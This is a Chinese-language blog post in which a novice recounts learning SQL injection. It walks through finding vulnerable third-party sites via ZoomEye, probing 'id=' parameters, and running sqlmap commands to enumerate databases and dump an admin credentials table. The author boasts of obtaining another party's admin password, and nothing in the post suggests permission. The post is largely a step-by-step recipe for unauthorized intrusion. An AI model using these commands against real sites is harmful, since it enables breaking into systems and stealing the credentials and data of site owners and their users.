菜鸟的sql注入历程

萌萌哒小菜鸟在学习sql注入。

可是看了好多篇关于sql注入的文章之后还是对sql注入一窍不通，只知道一会儿又是爆表一会儿又是爆数据库的，完全云里雾里的。

现在，经过一次实战后终于对sql注入有了一点深刻的了解。当前只接触到mysql，所以以下都以mysql数据库为例，而且也仅代表之前对此的认识，有些错误可能还没学到或意识到。当前实力比较菜，只会用sqlmap玩玩。

  一.sql注入的目的

        sql注入要么是获取别人的数据，要么是通过sql数据库提权到控制主机。

  二.注入步骤

        1.找到可注入的网站

              我一般是用ZoomEye去搜索网站，然后在站中找到以id=**结尾的地址，然后测试。

              例如： http://192.168.1.1/news?id=1

                         测试：若在地址栏中加一个分号 (即 http://192.168.1.1/news?id=1' ) 访问出错，不出现正常页面，则可能有漏洞。那么我们就可以用sqlmap来测试了。

        2.爆数据库类型及版本，爆数据库    

      sqlmap.py  -u  " http://192.168.1.1/news?id=1" --dbs 

3.猜出密码在哪个数据库中（猜不出就一个一个试）
sqlmap.py  -u  " http://192.168.1.1/news?id=1" -D databasename --tables 
-D参数加数据库名字   --tables显示表格

不加 -D 参数则显示全部表格

我们看到表格中有一个webadmin的表格，那么很有可能密码就在这个表格中。

4.显示表格中的内容

sqlmap.py -u "192.167.1.1/news?id=1" -D databasename -T webadmin --dump  
我们利用这条命令把webadmin这个表格下载下来分析。-T参数加表格名称  --dump  下载

下载之后的数据在~/.sqlmap/output/目录下。打开后可以发现，

管理员的账户和密码都出现了。不过这密码是经过MD5加密的，我没有破掉。

三.总结

这是我第一次搞到别人的密码 ，想想还是很激动的。

此次注入完全靠sqlmap，我还是处在一个脚本小子的阶段。不过有这次注入的经历，我对sql注入还是有更深一步的了解。

至于，sqlmap的其他使用，请借鉴sqlmap用户手册。（sqlmap很强大）

以上有问题的地方欢迎大家提出来，欢迎大家指出其中错误之处。